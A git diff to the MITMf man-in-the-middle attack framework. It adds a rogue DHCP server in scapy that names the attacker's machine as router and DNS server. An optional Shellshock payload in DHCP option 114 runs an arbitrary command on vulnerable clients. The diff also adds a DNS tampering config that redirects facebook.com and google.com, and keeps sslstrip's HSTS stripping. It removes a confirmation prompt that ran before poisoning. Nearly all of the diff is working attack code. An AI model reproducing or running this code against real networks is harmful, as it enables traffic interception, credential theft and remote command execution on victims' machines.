diff --git a/config_files/dhcp.cfg b/config_files/dhcp.cfg new file mode 100644 index 0000000..ed4417c --- /dev/null +++ b/config_files/dhcp.cfg @@ -0,0 +1,4 @@ +#Example config file for DHCP spoofing +ip_pool = 192.168.2.10-50 +subnet = 255.255.255.0 +dns_server = 192.168.2.20 #optional diff --git a/config_files/dns.cfg b/config_files/dns.cfg index c1f309b..816f218 100644 --- a/config_files/dns.cfg +++ b/config_files/dns.cfg @@ -1,3 +1,3 @@ -#Example config file for dns spoofing +#Example config file for DNS tampering www.facebook.com = 192.168.10.1 google.com = 192.168.10.1 diff --git a/mitmf.py b/mitmf.py index 3cffc32..463fe62 100755 --- a/mitmf.py +++ b/mitmf.py @@ -21,18 +21,19 @@ sergio_version = "0.2.1" if __name__ == "__main__": - parser = argparse.ArgumentParser(description="MITMf v%s - Framework for MITM attacks" % mitmf_version,epilog="Use wisely, young Padawan.",fromfile_prefix_chars='@') + parser = argparse.ArgumentParser(description="MITMf v%s - Framework for MITM attacks" % mitmf_version, epilog="Use wisely, young Padawan.",fromfile_prefix_chars='@') #add sslstrip options - sgroup = parser.add_argument_group("sslstrip","Options for sslstrip library") + sgroup = parser.add_argument_group("sslstrip", "Options for sslstrip library") sgroup.add_argument("-w", "--write", type=argparse.FileType('w'), metavar="filename", default=sys.stdout, help="Specify file to log to (stdout by default).") - sgroup.add_argument("--log-level", type=str,choices=['debug','info'], default="info", help="Specify a log level [default: info]") - slogopts = sgroup.add_mutually_exclusive_group() + sgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]") + slogopts = sgroup.add_mutually_exclusive_group() slogopts.add_argument("-p", "--post", action="store_true",help="Log only SSL POSTs. (default)") slogopts.add_argument("-s", "--ssl", action="store_true", help="Log all SSL traffic to and from server.") slogopts.add_argument("-a", "--all", action="store_true", help="Log all SSL and HTTP traffic to and from server.") sgroup.add_argument("-l", "--listen", type=int, metavar="port", default=10000, help="Port to listen on (default 10000)") sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.") sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.") + sgroup.add_argument('-d', '--disable-proxy', dest='disproxy', action='store_true', default=False, help='Disable the SSLstrip Proxy') #Initialize plugins plugins = [] @@ -49,7 +50,7 @@ if __name__ == "__main__": sgroup = parser.add_argument_group("%s" % p.name,"Options for %s." % p.name) else: sgroup = parser.add_argument_group("%s" % p.name,p.desc) - + sgroup.add_argument("--%s" % p.optname, action="store_true",help="Load plugin %s" % p.name) if p.has_opts: p.add_options(sgroup) @@ -59,10 +60,10 @@ if __name__ == "__main__": args = parser.parse_args() log_level = logging.__dict__[args.log_level.upper()] - + #Start logging logging.basicConfig(level=log_level, format="%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S", stream=args.write) - + #All our options should be loaded now, pass them onto plugins print "[*] MITMf v%s started... initializing plugins and modules" % mitmf_version load = [] @@ -75,20 +76,24 @@ if __name__ == "__main__": print "Plugin %s lacked initialize function." % p.name #Plugins are ready to go, start MITMf - URLMonitor.getInstance().setFaviconSpoofing(args.favicon) - CookieCleaner.getInstance().setEnabled(args.killsessions) - ProxyPlugins.getInstance().setPlugins(load) + if args.disproxy: + ProxyPlugins.getInstance().setPlugins(load) + reactor.run() + else: + URLMonitor.getInstance().setFaviconSpoofing(args.favicon) + CookieCleaner.getInstance().setEnabled(args.killsessions) + ProxyPlugins.getInstance().setPlugins(load) - strippingFactory = http.HTTPFactory(timeout=10) - strippingFactory.protocol = StrippingProxy + strippingFactory = http.HTTPFactory(timeout=10) + strippingFactory.protocol = StrippingProxy + + reactor.listenTCP(args.listen, strippingFactory) + + print "\n[*] sslstrip v%s by Moxie Marlinspike running..." % sslstrip_version + print "[*] sergio-proxy v%s online" % sergio_version + + reactor.run() - reactor.listenTCP(args.listen, strippingFactory) - - print "\n[*] sslstrip v%s by Moxie Marlinspike running..." % sslstrip_version - print "[*] sergio-proxy v%s online" % sergio_version - - reactor.run() - #cleanup on exit for p in load: p.finish() diff --git a/plugins/FilePwn.py b/plugins/FilePwn.py index af7c88a..08073c4 100644 --- a/plugins/FilePwn.py +++ b/plugins/FilePwn.py @@ -292,4 +292,4 @@ class FilePwn(Plugin): return {'request': request, 'data': data} def add_options(self, options): - options.add_argument("--filepwncfg", type=file, help="Specify a config file") + options.add_argument("--filepwncfg", type=file, help="Specify a config file [default: filepwn.cfg]") diff --git a/plugins/JavaPwn.py b/plugins/JavaPwn.py index f9a1c52..d6914cb 100644 --- a/plugins/JavaPwn.py +++ b/plugins/JavaPwn.py @@ -41,7 +41,7 @@ class JavaPwn(BrowserProfiler, Plugin): for key, value in self.javacfg.iteritems(): self.javaVersionDic[float(key)] = value - self.sploited_ips = [] #store ip of pwned or not vulnarable clients so we don't re-exploit + self.sploited_ips = [] #store ip of pwned or not vulnerable clients so we don't re-exploit try: msf = msfrpc.Msfrpc({"host": self.rpcip}) #create an instance of msfrpc libarary diff --git a/plugins/Spoof.py b/plugins/Spoof.py index 5342ac9..40b2ddc 100644 --- a/plugins/Spoof.py +++ b/plugins/Spoof.py @@ -13,6 +13,8 @@ from scapy.all import * import os import sys import threading +import binascii +import random try: from configobj import ConfigObj @@ -23,7 +25,7 @@ except: class Spoof(Plugin): name = "Spoof" optname = "spoof" - desc = 'Redirect traffic using ICMP, ARP or DNS' + desc = 'Redirect/Modify traffic using ICMP, ARP or DHCP' has_opts = True def initialize(self, options): @@ -33,15 +35,16 @@ class Spoof(Plugin): self.arp = options.arp self.icmp = options.icmp self.dns = options.dns - #self.dhcp = options.dhcp - self.domain = options.domain - self.dnsip = options.dnsip - self.dnscfg = options.dnscfg + self.dnscfg = "./config_files/dns.cfg" or options.dnscfg + self.dhcp = options.dhcp + self.dhcpcfg = "./config_files/dhcp.cfg" or options.dhcpcfg + self.shellshock = options.shellshock + self.cmd = "echo 'pwned'" or options.cmd self.gateway = options.gateway - self.summary = options.summary + #self.summary = options.summary self.target = options.target self.arpmode = options.arpmode - self.port = self.options.listen + self.port = options.listen self.manualiptables = options.manualiptables #added by alexander.georgiev@daloo.de self.debug = False self.send = True @@ -49,6 +52,9 @@ class Spoof(Plugin): if os.geteuid() != 0: sys.exit("[-] Spoof plugin requires root privileges") + if not self.interface: + sys.exit('[-] Spoof plugin requires --iface argument') + if self.options.log_level == 'debug': self.debug = True @@ -57,12 +63,6 @@ class Spoof(Plugin): os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X') if self.arp: - if self.icmp: - sys.exit("[-] --arp and --icmp are mutually exclusive") - - if (not self.interface or not self.gateway): - sys.exit("[-] ARP Spoofing requires --gateway and --iface") - self.mac = get_if_hwaddr(self.interface) self.routermac = getmacbyip(self.gateway) print "[*] ARP Spoofing enabled" @@ -70,50 +70,125 @@ class Spoof(Plugin): pkt = self.build_arp_req() elif self.arpmode == 'rep': pkt = self.build_arp_rep() + thread_target = self.send + thread_args = (pkt, self.interface, self.debug,) elif self.icmp: - if self.arp: - sys.exit("[-] --icmp and --arp are mutually exclusive") - - if (not self.interface or not self.gateway or not self.target): - sys.exit("[-] ICMP Redirection requires --gateway, --iface and --target") - self.mac = get_if_hwaddr(self.interface) self.routermac = getmacbyip(self.gateway) print "[*] ICMP Redirection enabled" pkt = self.build_icmp() + thread_target = self.send + thread_args = (pkt, self.interface, self.debug,) - if self.summary: - pkt.show() - ans = raw_input('\n[*] Continue? [Y|n]: ').lower() - if ans == 'y' or len(ans) == 0: - pass - else: - sys.exit(0) + elif self.dhcp: + print "[*] DHCP Spoofing enabled" + self.rand_number = [] + self.dhcp_dic = {} + self.dhcpcfg = ConfigObj(self.dhcpcfg) + thread_target = self.dhcp_sniff + thread_args = () if self.dns: - if not self.dnscfg: - if (not self.dnsip or not self.domain): - sys.exit("[-] DNS Spoofing requires --domain, --dnsip") - elif self.dnscfg: - self.dnscfg = ConfigObj(self.dnscfg) + print "[*] DNS Tampering enabled" + self.dnscfg = ConfigObj(self.dnscfg) if not self.manualiptables: os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE') - print "[*] DNS Spoofing enabled" self.start_dns_queue() file = open('/proc/sys/net/ipv4/ip_forward', 'w') file.write('1') file.close() if not self.manualiptables: - print '[*] Setting up iptables rules' + print '[*] Setting up iptables' os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port %s' % self.port) - t = threading.Thread(name='send_packets', target=self.send_packets, args=(pkt, self.interface, self.debug,)) + t = threading.Thread(name='spoof_thread', target=thread_target, args=thread_args) t.setDaemon(True) t.start() + def dhcp_rand_ip(self): + pool = self.dhcpcfg['ip_pool'].split('-') + trunc_ip = pool[0].split('.'); del(trunc_ip[3]) + max_range = int(pool[1]) + min_range = int(pool[0].split('.')[3]) + number_range = range(min_range, max_range) + for n in number_range: + if n in self.rand_number: + number_range.remove(n) + rand_number = random.choice(number_range) + self.rand_number.append(rand_number) + rand_ip = '.'.join(trunc_ip) + '.' + str(rand_number) + + return rand_ip + + def dhcp_callback(self, resp): + if resp.haslayer(DHCP): + xid = resp[BOOTP].xid + mac_addr = resp[Ether].src + raw_mac = binascii.unhexlify(mac_addr.replace(":", "")) + if xid in self.dhcp_dic.keys(): + client_ip = self.dhcp_dic[xid] + else: + client_ip = self.dhcp_rand_ip() + self.dhcp_dic[xid] = client_ip + + if resp[DHCP].options[0][1] == 1: + logging.info("Got DHCP DISCOVER from: " + mac_addr + " xid: " + hex(xid)) + logging.info("Sending DHCP OFFER") + packet = (Ether(src=get_if_hwaddr(self.interface), dst='ff:ff:ff:ff:ff:ff') / + IP(src=get_if_addr(self.interface), dst='255.255.255.255') / + UDP(sport=67, dport=68) / + BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr=client_ip, siaddr=get_if_addr(self.interface), xid=xid) / + DHCP(options=[("message-type", "offer"), + ('server_id', get_if_addr(self.interface)), + ('subnet_mask', self.dhcpcfg['subnet']), + ('router', get_if_addr(self.interface)), + ('lease_time', 172800), + ('renewal_time', 86400), + ('rebinding_time', 138240), + "end"])) + + try: + packet[DHCP].options.append(tuple(('name_server', self.dhcpcfg['dns_server']))) + except KeyError: + pass + + sendp(packet, iface=self.interface, verbose=self.debug) + + if resp[DHCP].options[0][1] == 3: + logging.info("Got DHCP REQUEST from: " + mac_addr + " xid: " + hex(xid)) + packet = (Ether(src=get_if_hwaddr(self.interface), dst='ff:ff:ff:ff:ff:ff') / + IP(src=get_if_addr(self.interface), dst='255.255.255.255') / + UDP(sport=67, dport=68) / + BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr=client_ip, siaddr=get_if_addr(self.interface), xid=xid) / + DHCP(options=[("message-type", "ack"), + ('server_id', get_if_addr(self.interface)), + ('subnet_mask', self.dhcpcfg['subnet']), + ('router', get_if_addr(self.interface)), + ('lease_time', 172800), + ('renewal_time', 86400), + ('rebinding_time', 138240)])) + + try: + packet[DHCP].options.append(tuple(('name_server', self.dhcpcfg['dns_server']))) + except KeyError: + pass + + if self.shellshock: + logging.info("Sending DHCP ACK with shellshock payload") + packet[DHCP].options.append(tuple((114, "() { ignored;}; " + self.cmd))) + packet[DHCP].options.append("end") + else: + logging.info("Sending DHCP ACK") + packet[DHCP].options.append("end") + + sendp(packet, iface=self.interface, verbose=self.debug) + + def dhcp_sniff(self): + sniff(filter="udp and (port 67 or 68)", prn=self.dhcp_callback, iface=self.interface) + def send_packets(self, pkt, interface, debug): while self.send: sendp(pkt, inter=2, iface=interface, verbose=debug) @@ -168,7 +243,7 @@ class Spoof(Plugin): DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=ip)) payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(spoofed_pkt), len(spoofed_pkt)) - logging.info("%s Spoofed DNS packet for %s" % (pkt[IP].src, pkt[DNSQR].qname[:-1])) + logging.info("%s Modified DNS packet for %s" % (pkt[IP].src, pkt[DNSQR].qname[:-1])) def start_dns_queue(self): self.q = nfqueue.queue() @@ -191,19 +266,21 @@ class Spoof(Plugin): return 'queue' def add_options(self,options): - options.add_argument('--arp', dest='arp', action='store_true', default=False, help='Redirect traffic using ARP Spoofing') - options.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP Redirects') - options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Redirect DNS requests') - # options.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using fake DHCP offers') + group = options.add_mutually_exclusive_group(required=False) + group.add_argument('--arp', dest='arp', action='store_true', default=False, help='Redirect traffic using ARP spoofing') + group.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP redirects') + group.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using DHCP offers') + options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Modify intercepted DNS queries') + options.add_argument('--shellshock', dest='shellshock', action='store_true', default=False, help='Trigger the Shellshock vuln when spoofing DHCP') + options.add_argument('--cmd', type=str, dest='cmd', help='Command to run on vulnerable clients [default: echo pwned]') + options.add_argument("--dnscfg", type=file, help="DNS tampering config file [default: dns.cfg]") + options.add_argument("--dhcpcfg", type=file, help="DHCP spoofing config file [default: dhcp.cfg]") options.add_argument('--iface', dest='interface', help='Specify the interface to use') options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP') options.add_argument('--target', dest='target', help='Specify a host to poison [default: subnet]') options.add_argument('--arpmode', dest='arpmode', default='req', help=' ARP Spoofing mode: requests (req) or replies (rep) [default: req]') - options.add_argument('--summary', action='store_true', dest='summary', default=False, help='Show packet summary and ask for confirmation before poisoning') - options.add_argument('--domain', type=str, dest='domain', help='Domain to spoof [e.g google.com]') - options.add_argument('--dnsip', type=str, dest='dnsip', help='IP address to resolve dns queries to') - options.add_argument("--dnscfg", type=file, help="Specify a config file") - options.add_argument('--manualiptables', dest='manualiptables', action='store_true', default=False, help='Do not setup iptables of flush iptables rules automatically') + #options.add_argument('--summary', action='store_true', dest='summary', default=False, help='Show packet summary and ask for confirmation before poisoning') + options.add_argument('--manualiptables', dest='manualiptables', action='store_true', default=False, help='Do not setup iptables or flush them automatically') def finish(self): self.send = False @@ -212,7 +289,7 @@ class Spoof(Plugin): file.write('0') file.close() if not self.manualiptables: - print '\n[*] Flushing iptables rules' + print '\n[*] Flushing iptables' os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X') if self.dns: diff --git a/sslstrip/ClientRequest.py b/sslstrip/ClientRequest.py index 6c2281c..fb869f7 100644 --- a/sslstrip/ClientRequest.py +++ b/sslstrip/ClientRequest.py @@ -55,11 +55,11 @@ class ClientRequest(Request): if 'accept-encoding' in headers: headers['accept-encoding'] == 'identity' - logging.debug("zapped encoding") + logging.debug("Zapped encoding") if 'Strict-Transport-Security' in headers: #kill new hsts requests del headers['Strict-Transport-Security'] - logging.debug("zapped a HSTS request") + logging.info("Zapped a HSTS request") if 'if-modified-since' in headers: del headers['if-modified-since']